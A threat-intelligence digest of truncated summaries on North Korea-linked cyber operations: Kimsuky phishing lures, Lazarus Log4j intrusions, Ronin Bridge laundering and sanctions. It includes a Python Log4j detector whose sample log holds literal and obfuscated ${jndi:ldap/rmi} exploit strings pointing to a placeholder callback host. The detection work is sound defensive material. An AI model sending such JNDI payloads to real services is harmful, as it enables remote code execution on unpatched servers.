ESRC reports a North Korea-attributed spear-phishing attack using an HWP document disguised as an invitation to appear on a KTV YouTube policy program. The lure targeted specialists in North Korea-related fields and used a malicious OLE object that displa…
AhnLab reported Kimsuky-linked attack attempts using malware disguised as press releases on topics including North Korea’s COVID-19 acknowledgement and other Korean public-announcement themes. The .NET executables used HWP or Word document icons, dropped …
Prelude released an APT38-themed emulation chain based on Castov malware used by DarkSeoul against South Korean financial industry and government targets. The excerpt says Castov acted as a downloader for second-stage malware, including payloads hidden in…
In the recent Ronin Bridge hack attributed to North Korea’s Lazarus Group, the hackers made extensive use of Tornado Cash to launder some of the stolen cryptoassets from the heist, which at the time of the theft totalled $540 million. Unlike simple P2P ex…
AhnLab observed suspected Lazarus activity exploiting CVE-2021-44228 in unpatched VMware Horizon servers used for remote work and cloud infrastructure operations in South Korea. The intrusion deployed a NukeSped backdoor variant associated with Lazarus si…
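The CVE-2021-44228 intrusion path in the AhnLab report starts with a JNDI lookup string reaching a Log4j-logged field. The detector below is an added example, not code from AhnLab or from any of the reports on this page: it normalizes the two common Log4j lookup obfuscations (`${lower:j}`/`${upper:j}` and the `${::-j}` default-value trick) and then matches `${jndi:<scheme>://...}`. The log lines are constructed, simplified access-log style entries with documentation IP addresses, not real VMware Horizon logs.

```python
import re

# Two Log4j lookup obfuscations seen in the wild, collapsed to their literal value:
#   ${lower:j} / ${upper:J}      -> j   (case folding; the final match is case-insensitive anyway)
#   ${::-j} / ${env:NOPE:-j}     -> j   (default-value syntax with an empty or undefined key)
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")

# Only the innermost lookups are matched (no braces inside), so we iterate to a fixed point
# to peel off arbitrarily nested wrappers.
def normalize(text: str) -> str:
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text

# After normalization, a JNDI lookup is a plain ${jndi:scheme://target}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}\s]*)", re.I)

def scan(lines):
    """Return (line_number, scheme, target) for every JNDI lookup found."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(line)):
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits

# Constructed sample log (not from the report); line 5 is a harmless lookup-shaped string.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Apr/2022:09:12:01 +0900] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"
203.0.113.7 - - [05/Apr/2022:09:12:04 +0900] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/o}"
203.0.113.7 - - [05/Apr/2022:09:12:05 +0900] "GET /portal/ HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/o}"
203.0.113.7 - - [05/Apr/2022:09:12:06 +0900] "GET /portal/ HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.7:1099/x}"
10.0.0.9 - - [05/Apr/2022:09:12:10 +0900] "GET /portal/?q=${date:yyyy} HTTP/1.1" 200 "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, scheme, target in scan(SAMPLE_LOG.splitlines()):
        print(f"line {n}: jndi {scheme} -> {target}")
```

Normalizing before matching is the point: a signature for the literal string `${jndi:` misses the second and third entries, while the callback host and port (the `ldap://` or `rmi://` target) are exactly the indicators worth pivoting on once a hit is found.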
Sophos profiles NICKEL KIMBALL as a North Korea-linked espionage group active since at least 2012 and aligned with aliases including Kimsuky, APT43, Emerald Sleet, THALLIUM, TA406, TA427, SharpTongue, and Velvet Chollima. The group targets NGOs, think tan…
Trend Micro's 2022 Japan targeted attack analysis observed four state-sponsored targeted-attack clusters in 2021, including Earth Kumiho/Kimsuky activity relevant to defense and diplomacy. The Earth Kumiho/Kimsuky section says the group was believed to ha…
ESTsecurity ESRC identified a North Korea-linked HWP document attack disguised as a survey for North Korean defector advisory committee members. The lure abused current news about anti-North Korea leaflet launches and displayed a fake HWP version message …
IssueMakersLab statistics cited by Boannews tracked suspected North Korean cyberattack activity from 2004 through 2021 and found it grew from five cases in 2004 to more than 300 times that level by 2021. The dataset includes activity attributed to Lazarus…
OFAC sanctioned Blender.io for the first time as part of an effort to disrupt laundering of funds stolen in the March 2022 Ronin Bridge hack attributed to North Korea's Lazarus Group. The action covered 45 Bitcoin addresses linked to Blender.io and four a…
South Korean prosecutors announced the arrest and indictment of a security offender accused of trying to recruit an active-duty officer and obtain military secrets under instructions from a North Korean agent. The press release states that the active-duty…
OFAC sanctioned Blender.io as the first virtual currency mixer designation, citing its use by DPRK’s Lazarus Group to launder proceeds from the March 2022 Axie Infinity/Ronin heist. Treasury said Lazarus stole roughly $620 million from the blockchain proj…
NCC Group details Lazarus initial-access activity built around LinkedIn impersonation, WhatsApp contact, and job-themed ZIP files containing malicious Office documents. The lure infrastructure included global-job[.]org, a domain likely chosen to imitate a…